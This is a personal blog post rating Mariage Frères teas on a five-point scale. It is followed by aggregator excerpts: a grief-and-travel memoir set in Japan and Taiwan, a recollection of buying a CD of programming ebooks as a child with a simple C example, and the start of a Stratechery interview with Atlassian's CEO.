It's been almost five years since I wrote about tea. We just Refreshed our Supplies (get it?) and I feel the need to store my thoughts on the various Mariage Frères (MF) teas we've bought over the years. I've been a faithful fan ever since drinking a Mariage Frères teabag at a team building session somewhere in 2012. Call me a snob, but while Palais des Thés and Whittard are generally a great choice as well, most MF teas are simply better. I even went to Paris and London just to get a new batch of MF tea. Their webshop was non-existent back then—it's still crappy now, but functional. As they ship from France, shipping to Belgium usually isn't free. No worries though: add a couple of hundred grams and you'll hit the free shipping quota in no time. Ouch. This post was inspired by Seb's tea reviews post. Seb employs Day of the Tentacle Hoagies to score the teas. Since my retro gaming codex uses Goblins 3 Blounts, it seemed appropriate to apply here as well. Consider this my personal Steepster database. The following list is a reconstruction of purchase histories from my notebooks:

Bloomfield Darjeeling

A spring first flush tea labelled SFTGFOP1: Super Fine Tippy Golden Flowery Orange Pekoe. Don't worry if your initial reaction to that is Huh?: it's a tea grading term denoting this is one of the highest-quality Darjeeling teas you can get, with the worst being labelled as D: Dust. That's what's inside a regular tea bag. Cheers. I love this Bloomfield. It's the best Darjeeling I ever gulped down. It's also one of the most expensive, and the price has only climbed since 2022. It's subtle, not bitter even if you steep it too long, has a lovely golden colour, can be re-steeped, and does not hit as hard as longer-fermented black teas. 5 out of 5 Blounts—Amazing.

Namring Royal Upper

I'm a big fan of Darjeeling tea: here's another high-quality variant from one of the oldest and largest tea estates in Darjeeling itself. I love to think it looks as picturesque as this Wikipedia plantation photo, but in reality, it will no doubt be a lot of hard work to carefully pluck the best Orange Pekoe leaves each season. We bought Namring to see if Bloomfield could be beaten. It couldn't—the difference is negligible and this one is even more expensive. Still great, though. 4 out of 5 Blounts—Great.

Earl Grey Provence

This must have been the first typical black Mariage Frères canister I've ever bought. I chanced upon it whilst Christmas shopping in a new cooking shop in my home town that's unfortunately long gone now. Earl Grey Provence is what it says it is: it's Earl Grey tea with a dose of Provence: lavender. My wife thinks it smells like bath water when I prepare a cup, but I don't care. The combination is perfect, and the smell is more intense than the taste. It's not the highest-quality, biggest-leaf black tea they selected for this mix, but it's not expensive either. If you like your Grey Earl-y (ha!) in the morning, try adding some lavender. Ingenious. 5 out of 5 Blounts—Amazing.

Roi Des Earl Grey

We must have bought kilos of Earl Grey Provence, so to spice things up, last year I bought another Earl Grey variant: the king of the Earl Greys. Well… not so much. It's good, but the typical citrus-y flavour comes on a bit too strong in this one, since there's nothing else in it. I'll consider buying it again once in a while but it won't beat Provence. 3 out of 5 Blounts—Good.

Chaï Chandernagor

Like I told you, I'm a sucker for Indian tea when it comes to black ones, and "chaï" is no exception.
The term is usually used in the west (or at least here?) to describe spiced black tea where adding a dollop of milk is maybe perhaps a little bit allowed. This mix doesn't just have cloves but some ginger and other stuff as well. Unfortunately, the black tea used as a base is of relatively low quality and quite fine-grained. I'll admit: I prefer Palais des Thés' simpler but more robust Chaï—not the Imperial one with the red pepper but the one with just cloves. 3 out of 5 Blounts—Good.

Chaï Parisien

Another variant of spiced black tea, with mellow fruity notes that come across as too mellow to me. If I want to drink a spiced black tea, I want to feel the kicker, not try to get the tongue tingled with "mellow fruity notes". This one wasn't what I expected of a "chaï". 2 out of 5 Blounts—Mediocre.

A selection of the typical black Mariage Frères tea canisters from our cupboard.

Fuji-Yama

The first MF tea I ever tasted and the one that got me hooked. It's a pure Japanese sencha tea grown near the foot of the Fuji-Yama mountain, with that typical grassy flavour. The dried leaves are even long and thin, reminiscent of dried grass. It's easy to screw up a batch by using too-hot water or letting it steep for too long. It's been a while since we bought it because we're venturing into other flavours right now, but you can't go wrong with this if you're looking for a clean, well-rounded tea to drink all day. Sencha is the most popular tea in Japan. If prepared well, the result is an appealing greenish liquid. If overdone or prepared with too-hot water, it'll yellow. 4 out of 5 Blounts—Great.

Tamaryokucha

A grassy variant of the above that edges toward the too-grassy side for me. Weird, as tamaryokucha is usually considered milder than typical sencha tea. I cleaned out the tin today: we bought it over six years ago and I threw out almost half of it. Not because it's bad, but because you've got to be in the right mood to drink this and there are others that somehow find their way into the tea strainer before it. Maybe try out Fuji-Yama first? The term Ryokucha literally translates to "green tea" and is the parent category of sencha (steamed) and other pan-fried green teas. It's again unoxidized, hence its bright green hue. Mental note: I should explore more Japanese teas. 3 out of 5 Blounts—Good.

Thai Mountain (rebranded to Royal Thai Tea)

According to MF, "A gourmet tea that whisks us away to the heart of Asia". The tea leaves are hand-rolled into tiny balls that slowly open as the tea steeps, unleashing round, milky flavours. It's hard to describe and not very cheap, but you only need a few "balls" and it can be re-steeped multiple times. It's unique enough to warrant a spot in your tea cabinet, although I'm unsure about its staying qualities. It was gifted to me and I have yet to buy a new batch, but I welcomed the occasional Thai Mountain cup during the day. 4 out of 5 Blounts—Great.

Genmaicha

Not necessarily to be categorized as "pure": another typical Japanese green tea, mixed with roasted rice. I have yet to drink this one but bought it because the last genmaicha I got from the Portland Japanese Garden was amazing, although that one also contained a bit of matcha. To be rated soon!

Marco Polo Vert

This is MF's flagship tea, available as black, green, blue (yeah, don't ask), and white teas. It's got a balanced flowery and fruity taste that leans towards vanilla—literally and figuratively. The tea is a good entry point towards more flowery/sweet-ish green teas—it's their flagship for a reason—if that is what you're after.
After we finished our supply, I don't think I'm inclined to buy more. 3 out of 5 Blounts—Good.

Ume

A beautiful limited edition canister served for a beautiful price (a dazzling sum at the time of writing), but worth it if you're a true tea believer. The green tea selected for this delicate infusion of plum blossoms is great and the fruity tones are not overwhelming. It's simply a superb fruity green tea. Too bad that stupid canister and the limited availability drive up the price. 5 out of 5 Blounts—Amazing.

Sakura 2000

One of the first fruity MF green teas that we tried and we keep reaching for. Personally, I'd prefer Ume, but given the big price difference and the fact that my wife prefers cherry blossom over plum blossom, we always buy a package of Sakura when ordering online. The flavour is perhaps a bit too much, and after years of drinking it, it can get a bit repetitive, but if you don't know what fruity tea to get and your budget is limited, make it this one. 4 out of 5 Blounts—Great.

Sweet Shanghaï

A rather heavily perfumed tea with hints and notes of a bit of everything, from rose leaves to exotic fruits. I liked it a lot at first, but the more I drank it, the less enthusiastic I became. I'd rather have a single dominating flavour than a sweet Shanghaï explosion. Still, I wouldn't say no to it. It's on par with Marco Polo, I guess. 3 out of 5 Blounts—Good.

Vert Amande

I used to be very into almonds. I still like a good chunk of marzipan during the local Sinterklaas festivities, but it should stay outside my tea, thank you very much. Almond-scented tea tends to become almond water with traces of tea, and this one is no exception. 1 out of 5 Blounts—Bad.

Jasmin Imperial

"'The King of Jasmine Teas' is made with very rare green tea," as stated by MF. As jasmine green tea fans, we tried three different jasmine flavours, and this one hits the sweet spot, although the differences are perhaps too small. The added difficulty is that we stocked these three teas at different times, so we couldn't do a direct comparison. Feel free to pick whatever you desire, but a jasmine green tea should always be part of your default tea attire. 4 out of 5 Blounts—Great.

Grand Jasmin Beauty

Brown-silver dried green tea buds/leaves that result in a golden liquid which can easily be confused with Darjeeling tea. It's still jasmine, only a bit too expensive for how small the difference in flavour is. I'm sure objectively speaking it's got a slight edge over Jasmin Imperial. 4 out of 5 Blounts—Great.

Jasmin Monkey King

Green tea from Hunan scented with jasmine flowers. More gray-greenish than the jasmine teas above. We found this one to be the least impressive jasmine tea—I think? It's been a while; this year we only stocked Jasmin Imperial. As far as I can remember, it was still good. 3 out of 5 Blounts—Good.

Paï Mu Tan

I was curious about pure white tea, but now I'm not anymore. It's just not for me: it tastes like… nothing? White tea is very delicate, and perhaps my Earl Grey Provence and spiced Chaï got my taste buds confused. The leaves are beautiful, but however I try to prepare it, I just don't like it. I'd rather not drink it. 1 out of 5 Blounts—Bad.

Pavillon De Laque

Same problem as Paï Mu Tan, but slightly less so due to the added fragrances of mild spices. The blue flowers lend it a nice and colourful touch, but for us it's not a saving grace. I guess we're just not white tea people. The fact that this tea is the most expensive in this entire list doesn't make it better. I kind of feel cheated.
2 out of 5 Blounts—Mediocre.

White Rhapsody

Just when I thought "okay, let's skip all white teas from now on", my mother-in-law gifts me a canister of White Rhapsody. I read the label—scented white tea—and moan. Still, I politely accept the gift, put on the kettle, and take a sip. Holy shit! This tea is amazing! I don't know what MF did to make this work, or perhaps it's because we drink a lot of flowery green tea, but I love the combination of what they call "summery nuances evoking peach, apricot and fig". Highly recommended. I was distraught to learn it was out of stock when I placed a new order last week. 5 out of 5 Blounts—Amazing.

Rouge Pleine Lune

This one's a rooibos tea mostly flavoured with almonds. And despite my last remark about almonds in teas, this time the combination seems to mostly work. I'm not a huge rooibos expert and only occasionally drink it plain. We've had this one on a back shelf for years and I recently decided to give it another go. It's not half bad, but I wouldn't be inclined to order more. 3 out of 5 Blounts—Good.

Pu-erh Suprême

Curious about fermented pu-erh teas, I ordered my first one last week. I just had a cup and must have done something wrong: it was surprisingly bland. Perhaps it needs more heat; I treated it like a green tea. I'll give it a few more goes before putting up a rating. To be rated soon!

Related topics: tea. By Wouter Groeneveld on 11 December 2025. Reply via email.

Alex White's Blog 1 month ago

A Difficult Memory of Travel

This is going to be a very different post from my normal. Not tech related, but instead a personal note meant to capture a memory that entered my head today. This post is emotional, and deals with death. I won't be offended if you skip it (heck, I won't know). As I drove my son to daycare this morning, a soft rain pattered the windshield. Something about the dreary, rainy morning triggered my mind to start reminiscing about my time in Japan and Taiwan years ago. I want to use this post to capture those memories. I've already started to forget details, so I'd like to remember what I can before they completely fade away.

2017 was a turbulent year for me. It started with a new job, which I later came to label "the most toxic place I ever worked". On the plus side, it was fully remote (as in, my manager lived in Japan). When I accepted the offer, I had the condition that I would be allowed to work from anywhere as well, not just the United States. To this end, I planned a month-long trip working in Japan and Taiwan in December. That fall, while sitting in the living room with my fiancée (now wife), I got a call from one of my cousins. My father, who I hadn't talked to in years (my parents had a messy divorce), had late stage cancer. Despite the anger and trouble that had separated my father and me, I absolutely fell apart (much harder than I expected, to be honest). The next week my wife and I drove to Virginia to visit my father. Not only was this my first time seeing my father in years, but also his first time meeting my future wife. I think I managed to hold it together when we arrived, but I know I fell apart again once we retreated to our room. He was in bad shape, and not very responsive. My last memory with my dad was saying goodbye to him as he lay on the bed. He was showing me the bell he could ring if he needed anything. He then offered me some of his gummy bears. The same brand he and I had always munched on before a night-long marathon of Gran Turismo on the PS1 when I was a kid. And then we said goodbye.

I remember being convinced I was going to cancel my trip abroad that was fast approaching. I didn't want to be so far away from my dad. But the truth was, we were back in Ohio and there was nothing I could do. My family convinced me to follow through with the trip, considering everything was already booked. That December I landed at Narita International Airport outside of Tokyo. It was a rainy evening as I took the Narita Airport Express, then several local transfers to my destination station, Asaka Station in Saitama. As I exited the station, a Takoyaki stand caught my eye, so I loaded up on octopus balls to serve as my dinner. The Airbnb I was staying at was about a 15 minute walk from the station. At one point during the walk, I climbed up a hill following the winding road. There was a beautiful view of the prefecture, the kind of view that gives you shivers as you realize how far from home you are. I arrived at the Airbnb, nestled in a residential area with a beautiful park across the street. Airbnbs were (maybe still are) considered short-term apartment leases in Japan, so the first step after arriving was to fill out a leasing application and leave it in the mailbox. After the necessary forms were signed (I unfortunately did not remember to take my Hanko), I chowed down on Takoyaki and slept through the jet lag. If you're familiar with the Tokyo area, you might be asking "why stay way out in Saitama?".
I am familiar with the area: in 2012 I spent a semester at Musashi University. My dorm was in Asaka, so the area has a special place in my heart. The next morning (or afternoon, I think I slept for a while) I spent the day down memory lane, visiting places from my college days. I saw my old dorm, traced the paths I took to school and visited my favorite Indian restaurant in Tokyo. I still had a lunch coupon I had kept from 2012 for the restaurant, but unfortunately they said it had expired. It was worth a shot though! That night I arrived back at the Airbnb. I decided to give my grandmother a call to check in on things. I don't remember the conversation, but I do remember at one point she said with confusion, "wait, nobody's told you yet?". She informed me my father had passed away while I was on my flight. Surprisingly, I held myself together when I learned the news. As the weekend ended, I started going to a co-working spot to work. I continued exploring at night. In a few days, I was to visit my manager (let's call him K) and stay at his house in Nikko for two nights. I seemed to be doing okay. But sometimes fate is cruel. To be honest, I don't remember the timeline very well. I think it was a few days after hearing about my dad that my mom called. Her mother had passed away unexpectedly. And yet, somehow, I was still okay. What else could I do? Stuck on the other side of the world, far from my family.

I remember getting off the train at Nikko to stay with K. I was confused, as the doors didn't open automatically like they usually do. An older woman showed me you had to press a button to open them. I guess it gets so cold and snowy in the area, they don't want to let the cold and snow in if they don't have to. K picked me up from the station and drove me to their house in the countryside. It was a beautiful house he and his dad had restored. A mix of Japanese and American influence. We had Korean BBQ for dinner in the small town with his wife and kids. The next morning, we played hooky and went on a trip into the mountains. It felt like we were in Initial D, driving along the winding roads (in fact, we might have been; I've never looked it up, but the road seemed nearly identical to the one in the movie). We visited a temple at the top of a mountain. As we walked up the steps, the silence struck me. A gravel path led through a tunnel of trees that blocked out the sky. K apologized that we couldn't see the view due to the fog. Honestly, I couldn't have imagined a more beautiful view as it was. After our trip through the mountains we stopped at a roadside ramen restaurant. It's funny how much bigger the bowls of ramen are in Japan, at a fifth of the US price.

The next day I was back on the train to Tokyo. In two days I had a flight to Taipei to catch. The night before my flight, I met up with an old friend who had been in my exchange group. He had managed to stay in Tokyo as a JET teacher. We visited an Izakaya in Ikebukuro for a few drinks. After saying our goodbyes, I boarded the train to Ueno. I remember, after exploring the shrines, I walked down to the water. As I stared across the water at the city, the grief finally hit me. I tried to somewhat keep my composure, but tears blurred my vision while I headed through the crowds back to the station. 24 hours later, I was in a new Airbnb, minutes away from the Shilin night market in my favorite city in the world, Taipei. I spent three weeks in Taiwan, working out of various coffee shops and a co-working spot called Project 0.1.
I met a lot of amazing people at the co-working spot. We had lunches and breakfasts together and visited the night market. I spent time at the Beitou public library, which must be one of the most beautiful buildings on Earth. Nestled in the middle of the hot spring district, it's a large wooden building that looks and smells exactly like you'd hope a hot spring library does. Near the end of my trip, I went on a weekend visit to Kaohsiung for my birthday. Located in the southernmost part of Taiwan, Kaohsiung is about a two-hour high-speed rail trip from Taipei. A port city, Kaohsiung is right on the water, with large cargo ships coming and going. It was a lot less chaotic than Taipei, and there's a bustling art scene in the docks district. I spent a night wandering around shipping containers converted to cafes as a group sang Christmas songs on the sidewalk.

My second night in Kaohsiung I stumbled upon a building that had a kiosk for scanning your train/travel card to pay. Figuring it was some kind of public transport, I scanned and entered the lobby, curious where I'd end up. It turned out to be a ferry that took me to Wusong, a small island next to the city. Upon disembarking, I wandered down a beach until I came upon a small coffee shop in the middle of the sand. I sat with a latte, enjoying the view. Next to me, an elderly man with 10 cell phones running Pokemon Go took note of each Pokemon he encountered in a small notebook. Having finished my latte, I followed the path to a long tunnel cutting through the mountain. Two fishermen tried to converse with me as we walked along the path. My Mandarin was a lot worse back then (not saying it's great now either), and they quickly gave up. As the sun set, I found myself on top of the mountain (maybe large hill is more accurate). I had stumbled upon Cihou Fort, an old fortress that used to guard the entrance to Kaohsiung harbor. I sat on some rocks, looking over the town below. A familiar song drifted through the air as a garbage truck far below collected trash (garbage trucks in Taiwan play music so people know to bring out their trash). Before heading back to the city, I grabbed a beer at a beachside bar and watched the waves.

On my birthday, I decided to treat myself to the newly released Star Wars movie. It was a small theater, maybe two screens. As I was purchasing my ticket, an American and his wife approached. "Want to watch with us and have a beer?" he asked as he held up a 6-pack. It was a great movie, made better with my new friends. The next night I explored the Love River. I hired a small boat to take me around. Afterwards, I grabbed a drink at a bar next to the water and listened to a live rendition of "One Night in Beijing" from some slightly intoxicated patrons. As I was gearing up to head back to the hotel, I walked along an old railroad track that overlooked the river. Leaning against the railing, watching the boats glowing with neon lights, the grief visited me again. I spent a while on that bridge, attempting to work through my emotions. That night is probably the strongest memory I have of the trip. A few days later I was back home in Ohio with my fiancée, our dog and our cats. It was a difficult trip, but also an amazing one that shaped my life. It was hard working through the grief, especially without family, but I met a lot of friends that helped me get through it. One is never done with grief, writing this article has brought me close to tears again, but it does get easier.
Reflecting on the time, I can also be thankful for those last moments with my father and the support of my family. When my son and daughter are older, I want to take them back to that bridge overlooking the river in Kaohsiung. I hope to confront those emotions again, but with them by my side. I want to be there for them in a way my own father wasn’t. This article is more for me than the readers, so I apologize for that. It feels good to write this though, and if you did read through it I’m more than happy to chat about adventures in Taiwan or Japan! I’ve been to both countries twice and have extremely fond memories of both, and so many stories (like the crazy bus driver of Jiufen, the terrifying Maokong Gondola ride, being lost and found in Sapporo and discovering Okonomiyaki in Ekoda).

0 views
Ankur Sethi 1 month ago

My first online shopping experience, at the tender age of twelve

I wrote the first draft of this post as an exercise during a meeting of IndieWebClub Bangalore.
When I was eleven or twelve, a friend at school told me that video games like Age of Empires were built using a language called C. When pressed for details, he had nothing more to tell me. What did he mean by language? Was it like English? How could you use a language to make things move around on the computer screen? He didn't know. His older brother had informed him about the existence of C and its relationship with video games, but he had inquired no further.
I was desperate to learn C, whatever it was. Only, I had no idea who to ask or how to go about learning this "language". I could've searched the web, but this was 2002. If I was lucky, I was allowed to use the dial-up for an hour every week. Search engines were bad and my search skills were rudimentary. The web was not yet filled with thousands upon thousands of freely available programming tutorials. And in any case, it was far more important to download the latest Linkin Park MP3.
Luckily, Dad knew somebody who worked at the National Institute for Science Communication and Policy Research. They had just published a series of computer education books targeted towards an increasing population of new computer users. Dad had mentioned to him that I was interested in computers, so one day he handed Dad a giant brown envelope containing two books: a book about the basics of Microsoft PowerPoint, and a slim volume called The C Adventure.
The C Adventure only covered the very basics of C: variables, conditionals, loops, and functions. It didn't cover structs, pointers, macros, splitting programs into multiple files, build systems, or anything else that would allow me to build the kind of real-world programs I wanted to build. But that didn't matter. The universe had heard my plea. I finally knew what C was. I could even write a bit of it! They were simple programs that ran in the terminal (I've reconstructed one from memory at the end of this post), but at the time I felt drunk with power. I was one step closer to building Age of Empires. I could do anything with a computer, anything at all. The only limit was myself.
But The C Adventure wasn't enough. If I wanted to build games, there was a lot more I'd need to learn: reading and writing files, connecting to the internet, opening windows, rendering 3D graphics, playing sound, writing game AI, and who knew what else. But once again, I didn't know where to find more learning resources. The government had come to my aid once, but I couldn't rely on obscure government departments to come to my aid every time. I had to take matters into my own hands. And I did just that, this time finding my salvation in the free market.
I had no idea where to buy programming books in Delhi, but I reasoned that it might be possible to buy them on the internet. I'd visited American e-commerce websites. Might there be Indian equivalents? I'd seen TV and newspaper ads for a website called Baazee.com. The ads said something about buying and selling. Perhaps this was where I'd find my next C book? One evening, during my one weekly hour of parentally approved and monitored internet, I typed Baazee.com into the Internet Explorer 6 URL bar and began my search. A few minutes of searching led me to a product called "101 Programming eBooks". It was allegedly a CD containing, well, 101 programming ebooks. The seller had good reviews, and the product description looked compelling, so, with an excess of hope, I clicked the buy button.
At the end of the checkout process, the website asked for my credit card details, and that's where I realized my whole endeavor had been doomed from the very start. The problem was that my parents didn't have a credit card at the time, and no amount of convincing on my part would induce them to get one. They'd heard too many horror stories of people getting deep into credit card debt and losing their homes. The newspapers were filled with stories of scams and frauds on the nascent internet, most of which involved stealing people's credit card details and using them to run up huge bills.
But twelve-year-old Ankur needed to learn C. It was a life and death situation, couldn't they see? I would not allow my parents' stubborn disapproval of predatory American financial instruments to stand between myself and Age of Empires. So I did what anyone in my place would have done: I begged my Dad to get a credit card, just this once, just for this one purchase. I threw a tantrum. I cried until I ran out of tears. But nope, it was all in vain. Computers and money were not allowed to mix, not in our household. No credit cards, full stop.
Dejected, I went back to the computer to close all my Internet Explorer 6 windows, when the universe once again chose to smile upon me. The person selling "101 Programming Ebooks" had left their email address on the product description page! Dad urged me to write to them and figure out if we could pay for the CD with cash or cheque. So I sent an email, and the seller responded with his phone number. He lived in Delhi, not very far from where my family lived. He said we could pick up the CD from his address and pay him in cash. Oh sweet joy! Oh divine providence!
I wanted to go meet the seller myself, and do so immediately. But Dad was more cautious. He first talked to the seller on the phone to make sure he was a real person. He asked him a bunch of questions. When he was satisfied that nothing shady was going on, he went to pick up the CD himself. He might have taken a friend or co-worker with him. He'd read enough scary stories about the internet in the newspapers, and he did not want to appear on page seven or whatever of the Times of India.
The seller was just a college kid, still in his early twenties. He was pirating ebooks, burning them to CDs, and selling them online out of his bedroom for some extra cash. My dad was impressed by the entrepreneurial spirit on display, but neither he nor I understood that selling pirated ebooks was illegal. It didn't matter, though. Everything that had to do with computers and the internet in India was illegal in the 2000s, so nobody cared.
One joyous evening Dad returned home with the CD. It came in an unmarked white paper envelope, with the words "101 Programming Ebooks" scrawled on the disc in permanent marker. I inserted the disc into the family computer and found it contained exactly what had been advertised: a collection of technical ebooks sorted into directories, mostly published by O'Reilly, in PDF and CHM formats. In fact, there were a lot more than just 101 ebooks in there! My first online purchase had turned out to be incredibly satisfying. The Baazee.com pirate had underpromised and overdelivered.
I spent a lot of time reading the books on that CD. I don't remember if I ever read any single one of them cover to cover, but I remember dipping in and out of tens of them, picking up something at random whenever the fancy struck me. I remember learning a bit of Perl and writing some simple programs.
I remember trying to learn Java but being turned off by . I remember spending hours reading a book about XML but having no clue why I would want to use it. Could I use it to build Age of Empires? No? Then I didn't care.
I never ended up building my own version of Age of Empires, but I did go on to use some of the books in the collection to learn and use C (and some C++) profitably for many small projects. Later, when I was in college, I even learned some Objective-C and made a bit of money building an iPad game for a small marketing agency. So technically I've been paid to build a video game, and technically some part of it was built with C. Success? Let's call it a success.
While no single book on the "101 Programming Ebooks" CD changed my life, the collection gave me a vast buffet of tools and technologies to sample from. It expanded my mind and allowed me to see the full spectrum of possibilities in a computer career. Looking back at that event 23 years later, the only book I can remember clearly is the Camel Book, but I'm sure there were many more in that collection that I used to occupy slow evenings.
I sometimes wonder where that college kid is now, the one who was selling pirated ebooks out of his bedroom. Did he go on to start his own tech company? Did he move to America, as so many people in tech do? Or does he still live somewhere in Delhi, ripping Hindi TV shows off Amazon Prime and helping people jailbreak their Nintendo Switches? Wherever he is, I hope he's done well for himself. I am forever grateful for "101 Programming Ebooks" and the wild-west internet of the 2000s.
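As promised, here's roughly what those first post-The C Adventure programs looked like: a variable, a loop, a conditional, and a function, and that was the entire extent of my powers. This is a reconstruction from memory, not an actual example from the book, so treat it as illustrative rather than historical:

    #include <stdio.h>

    /* a function, one of the four things the book covered */
    int square(int n) {
        return n * n;
    }

    int main(void) {
        int limit = 10; /* a variable */

        /* a loop, with a conditional inside it */
        for (int i = 1; i <= limit; i++) {
            if (i % 2 == 0) {
                printf("%d squared is %d\n", i, square(i));
            }
        }
        return 0;
    }

Compile it, watch a few numbers scroll by in the terminal, and feel one step closer to Age of Empires.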

0 views
Stratechery 1 month ago

An Interview with Atlassian CEO Mike Cannon-Brookes About Atlassian and AI

Good morning,
This week's Stratechery Interview is with Atlassian founder and CEO Mike Cannon-Brookes. Cannon-Brookes and Scott Farquhar — whom I interviewed in 2017 — founded Atlassian in 2002; their first product was Jira, a project and issue-tracking tool, followed by Confluence, a team collaboration platform. Atlassian, thanks in part to their location in Australia, pioneered several critical innovations, including downloadable software and a self-serve business model; over the ensuing two decades Atlassian has moved to the cloud and greatly expanded their offering, and is now leaning into AI.
In this interview we discuss that entire journey, including Cannon-Brookes' desire to not have a job, how the absence of venture capital shaped the company, and how the company's go-to-market approach has evolved. We then dive into AI, including why Cannon-Brookes believes that there will be more developers doing more, and why Atlassian's position in the enterprise lets them create compelling offerings. Finally we discuss Atlassian's sponsorship of Williams, the F1 race team, and why Cannon-Brookes thinks they can both help Williams win and also accrue big benefits for Atlassian.
To repeat a disclosure I have long made in my Ethics Statement, I did, in the earliest years of Stratechery, take on consulting work for a limited number of companies, including Atlassian. And, for what it's worth, I'm also a huge F1 fan! Go Max. As a reminder, all Stratechery content, including interviews, is available as a podcast; click the link at the top of this email to add Stratechery to your podcast player.
On to the Interview. This interview is lightly edited for content and clarity.
Mike Cannon-Brookes, welcome to Stratechery.
MCB: Thank you for having me, Ben.
So this is admittedly a new experience for me; I've already interviewed the founder of Atlassian, but it wasn't you. I'm of course referring to Scott [Farquhar]. That was eight years ago, actually, before I even had podcasts. It was very brief, but hey, like I said, new experiences.
MCB: That's true. That's true. And you wrote a consulting paper for us in 2014!
I was going to disclose, yes: in the very brief period where I did consulting work, you flew me down to Sydney for a week, and I had a chance to learn a lot about Atlassian. And on a personal note, that consulting contract helped me a lot; that was when I was just starting. It's funny how small the numbers seem in retrospect, but maybe that's why I've shied away from writing about you too much over the years, because it meant a lot to me. So I appreciate it, and there's my disclosure for the interview.
MCB: Thank you. It's a good piece of work. Don't forget, ironically, we started as a consulting and services business and then decided that software was a better business model, so I think you did the same thing. You went the scalability route instead of the consulting work via Sydney.
Absolutely. I'm not doing anything that doesn't scale anymore, but I did love visiting Sydney, so it was great.
MCB: Still, we pulled out the old consulting paper you wrote for us in 2014. Why are we going to win, why are we going to lose, everything else; it was classic Ben work.
Was it good?
MCB: It's pretty good!
It's interesting, I'd probably be embarrassed if I read it today. Anyhow, the good news is that since it's the first time I'm interviewing you, I do get to do my favorite segment, which is learning more about you. Where did you grow up, but also, where were you born? I know they were different places. Then, how'd you get interested in technology, and what's your version of the Atlassian origin story?
MCB: Sure, I feel like I've heard this question 1,000 times! Where to start? My dad was in banking; he joined, from England, the glorious institution that is Citibank today. My parents are both from Cambridge and bounced around the world a lot as part of that job. He took the, "Hey, we need someone to go to this country", and he was like, "I'll take that". So I was born in America, during a period we lived in New York. To be honest, I lived there for three months before I moved to Taiwan.
Really? Whoa. I didn't know that.
MCB: Yeah, in 1980, when it was very different than what it is today.
Yeah. Were you saving that to drop on me? I had no idea. I thought you went straight from America to Australia.
MCB: I only just thought about it about 30 seconds ago, actually. No, I went to Taiwan for a few years, lived in Hong Kong for a few years, went to Australia for a few years. So how I got into technology is actually related, because my parents were moving around so much, and the logic was, being English, that they would send us to English boarding schools once we got old enough, and that would be a stable thing while they were moving. So at the mighty age of seven, I was put on Qantas and sent to England and back four times a year to go to boarding school in England for about five, six years. Because of that boarding school, I have one of the lowest frequent flyer numbers in Australia; they introduced the frequent flyer program and that was at the end of my year one or year two. I get given this catalog by my parents: you've earned all these points, "What do you want to buy?", and it's like, "I don't know, trips, winery things, booze". I'm flicking through this catalog and I'm like, "There's literally nothing in this catalog" of gear that I wanted, and at the back is this computer, so I was like, "I guess I'll get that".
The only thing that was potentially age appropriate.
MCB: That was the only thing in the catalog; I didn't want a toaster, I didn't want wine, so that became my first computer, the mighty Amstrad PC20. Four colors, no hard drive. Eventually, I bought an external floppy drive, so you could put in two, and I did buy magazines and type in programs and write games and stuff from magazines and play with it. Played a lot of video games, basically, back in that era. I was into computers peripherally all through high school. I came back to Australia at 12 (my parents had settled here by then and weren't moving), and so I came back here and did all of high school and university here. In high school, I was always going to be an architect, that was my dream the entire way through, but come the end of grade 12, I applied for a bunch of university scholarships and ended up getting one, so I thought, "Oh, well, maybe I'll take that", and it was in a course called BIT. Basically, half computer science, half finance and economics, but it was 15 grand a year, tax-free, so I was like, "Well, I'll do that for a while and go back to the architecture thing". Of course, famously, in that scholarship I met the business partner of my first startup and the business partner of my second startup; they went in radically different directions in terms of outcome, but it was just 30 kids right at the right time, did the dot-com era thing.
Now, ironically, as a part of that scholarship, you had to spend six months in three industrial placements, so the origin story of Atlassian comes from then a little bit, because those industrial placements were so boring. Scott spent six months installing Windows at a large corporate, and he was crazy freaking smart, and it was like, "Hey, go from computer to computer and upgrade to Windows 98", or whatever it was. It was like, "Guys, this is our life, this is going to be horrible". I worked for Nortel Bay Networks, which was at the time a massive competitor to Cisco and then completely disappeared, so a good tech lesson in and of itself. I basically cataloged a room full of networking gear and routers; it was mind-numbingly boring. So towards the end of the university course, I famously sent an email to a few people saying, "Look, I don't really want to get a real job, why don't we start a company and we'll try some stuff?".
And this was after the dot-com era? This was the early 2000s?
MCB: This was after the dot-com era, yeah. I lived through the dot-com era actually as a journalist and writer, an analyst in technology. I worked for a company called Internet.com, which became Jupiter Media and Jupiter Research, and that was great, that was an amazing era for me. We ran events, newsletters, what would've been podcasts, we didn't have them back then. And we ran events, Mobile Monday I think one of them was called, and it was all about WAP and—
Well, the real secret is you're not the only one. There are some founders that are very successful who are like, "Look, I just want to pontificate about technology".
MCB: A little bit like you. I remember getting in a lot of trouble from some of the startups, because some company would launch and I wrote basically 500 words on, "This thing's never going to work, this is a disaster of an idea", and they would ring up and yell at my boss, and he was awesome, he'd be like, "Dude, just keep writing what you think", and it didn't make you very popular as a journalist type. Anyway, I emailed some people, tried to start a business; we didn't actually know what we were going to do. Atlassian has, I always tell people, a terrible origin story. You should not copy us.
You just didn't want to be installing Windows or upgrading software.
MCB: We literally did not want to get a real job. And Scott replied and said, "Yeah, sure, I'm in for trying that". He was one of the smartest kids in our class and his nickname is Skip, because he was the president of our student association and always a leader type and Eagle Scout and everything else, so we're like, "Yeah, okay, let's do that, we're good mates" — and that started Atlassian. We picked the name in about five minutes, which, if you consulted any branding company, would not have been chosen. Ironically, originally we were going to do customer service and consulting, that was what the gig was. Hence the name: Atlas was a Greek titan whose job was to stand on top of the Atlas Mountains and hold up the sky; that's what he was supposed to be doing. He was a bad guy, so his punishment was to hold the sky up, and we thought that was an act of legendary service, and so we were going to provide legendary service by holding up the sky for customers. As I said, we did the service thing for about six months and decided that this was a terrible business. People paying us $350 US to answer their questions; it didn't scale, and it was at crazy hours of the morning and night and everything else.
So in the meantime, we wrote the first version of what became Jira. We actually wrote three pieces of software: one was a knowledge-base type tool, one was a mail archiving tool for groups, so you could see each other's email as a shared archive.
And were you seeing this because you were building tools for yourself, for your consulting business?
MCB: Literally, yes, exactly. So all three were tools that we needed for ourselves. People would email us, and I couldn't see Scott's email and he couldn't see mine at the time, and it was like, this is silly, and we built Jira to handle questions and issues and problems that we were having ourselves. It became a teeny bit popular; there was this glimmer that someone else cared, so we poured all the effort into that.
What was that? What was the glimmer? Because this is when Agile is taking over software development, and at least the legend is Jira and Agile go hand in hand. Is that a correct characterization?
